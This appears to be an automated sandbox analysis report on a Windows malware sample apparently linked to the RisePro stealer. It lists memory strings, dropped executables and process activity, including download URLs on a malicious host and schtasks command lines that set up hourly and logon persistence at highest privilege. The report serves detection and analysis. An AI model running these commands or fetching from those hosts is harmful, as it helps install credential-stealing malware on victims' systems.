Source: MlpxPf.exe, 00000012.00000002.1802677497.0000000001286000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
Source: MlpxPf.exe, 00000012.00000002.1802677497.0000000001286000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarC:
Source: MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rark
Source: MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
Source: MlpxPf.exe, 00000012.00000002.1802677497.0000000001248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarY
Source: MlpxPf.exe, 00000012.00000002.1802677497.0000000001286000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarcC:
Source: MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarq
Source: Amcache.hve.2.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: MlpxPf.exe, 00000002.00000003.1465075782.0000000001392000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3925994112.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3926322511.0000000000F1D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3926018738.000000000167A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000011.00000002.3926399137.000000000169E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORT
Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3925994112.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORTu
Source: RageMP131.exe, 00000011.00000002.3926399137.000000000169E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORTuH
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: SciTE.exe.2.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_8c964baa-a

System Summary

PE file contains section with special chars

Source: Lisect_AVT_24003_G1A_37.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_37.exe	Static PE information: section name: .idata
Source: Lisect_AVT_24003_G1A_37.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_37.exe	Static PE information: section name: %~u
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name: .idata
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name: %~u
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name: .idata
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name: %~u
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR

PE file has a writeable .text section

Source: MlpxPf.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_0034A800	0_2_0034A800
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_00272040	0_2_00272040
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_0028A100	0_2_0028A100
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_0035991F	0_2_0035991F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_002F1940	0_2_002F1940
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_002842A0	0_2_002842A0
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_002722C0	0_2_002722C0
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_0027AB50	0_2_0027AB50
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_002FBBB0	0_2_002FBBB0
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_002F4C20	0_2_002F4C20
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_002E06F0	0_2_002E06F0
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_00353ED8	0_2_00353ED8
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_0027A720	0_2_0027A720
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_00350750	0_2_00350750
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 2_2_00356076	2_2_00356076
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 2_2_00356D00	2_2_00356D00
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0090A800	8_2_0090A800
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_00832040	8_2_00832040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0084A100	8_2_0084A100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0091991F	8_2_0091991F
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_008B1940	8_2_008B1940
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_008442A0	8_2_008442A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_008322C0	8_2_008322C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_008BBBB0	8_2_008BBBB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0083AB50	8_2_0083AB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_008B4C20	8_2_008B4C20
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_00913ED8	8_2_00913ED8
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_008A06F0	8_2_008A06F0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0083A720	8_2_0083A720
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_00910750	8_2_00910750
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_0090A800	11_2_0090A800
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_00832040	11_2_00832040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_0084A100	11_2_0084A100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_0091991F	11_2_0091991F
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_008B1940	11_2_008B1940
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_008442A0	11_2_008442A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_008322C0	11_2_008322C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_008BBBB0	11_2_008BBBB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_0083AB50	11_2_0083AB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_008B4C20	11_2_008B4C20
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_00913ED8	11_2_00913ED8
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_008A06F0	11_2_008A06F0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_0083A720	11_2_0083A720
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_00910750	11_2_00910750
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_00A0A800	17_2_00A0A800
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_00932040	17_2_00932040
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_0094A100	17_2_0094A100
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_00A1991F	17_2_00A1991F
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_009B1940	17_2_009B1940
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_009442A0	17_2_009442A0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_009322C0	17_2_009322C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_009BBBB0	17_2_009BBBB0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_0093AB50	17_2_0093AB50
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_009B4C20	17_2_009B4C20
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_009A06F0	17_2_009A06F0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_00A13ED8	17_2_00A13ED8
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_0093A720	17_2_0093A720
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_00A10750	17_2_00A10750
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 18_2_00596076	18_2_00596076
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 18_2_00596D00	18_2_00596D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\MlpxPf.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794

Source: C:\ProgramData\MPGPH131\MPGPH131.exe

Code function: String function: 0090D940 appears 46 times

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 1572

Source: MyProg.exe.2.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3929882601.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_37.exe
Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_37.exe
Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1500661513.00000000050A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_37.exe
Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1501430554.00000000050A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_37.exe
Source: Lisect_AVT_24003_G1A_37.exe	Binary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_37.exe

Source: Lisect_AVT_24003_G1A_37.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: MlpxPf.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: MlpxPf.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: MlpxPf.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: Lisect_AVT_24003_G1A_37.exe	Static PE information: Section: ZLIB complexity 0.9992931872814685
Source: RageMP131.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9992931872814685
Source: MPGPH131.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9992931872814685

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@26/29@1/2

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 2_2_0035119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,		2_2_0035119F
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 18_2_0059119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,		18_2_0059119F

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

File created: C:\Users\user\AppData\Local\RageMP131

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3800:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1840

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

File created: C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\43f50b5b.bat" "

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

Source: Lisect_AVT_24003_G1A_37.exe	ReversingLabs: Detection: 94%
Source: Lisect_AVT_24003_G1A_37.exe	Virustotal: Detection: 84%

Source: Lisect_AVT_24003_G1A_37.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: MPGPH131.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: MPGPH131.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RageMP131.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

File read: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe"
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Process created: C:\Users\user\AppData\Local\Temp\MlpxPf.exe C:\Users\user\AppData\Local\Temp\MlpxPf.exe
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown	Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 1572
Source: unknown	Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process created: C:\Users\user\AppData\Local\Temp\MlpxPf.exe C:\Users\user\AppData\Local\Temp\MlpxPf.exe
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\43f50b5b.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Process created: C:\Users\user\AppData\Local\Temp\MlpxPf.exe C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process created: C:\Users\user\AppData\Local\Temp\MlpxPf.exe C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\43f50b5b.bat" "	Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
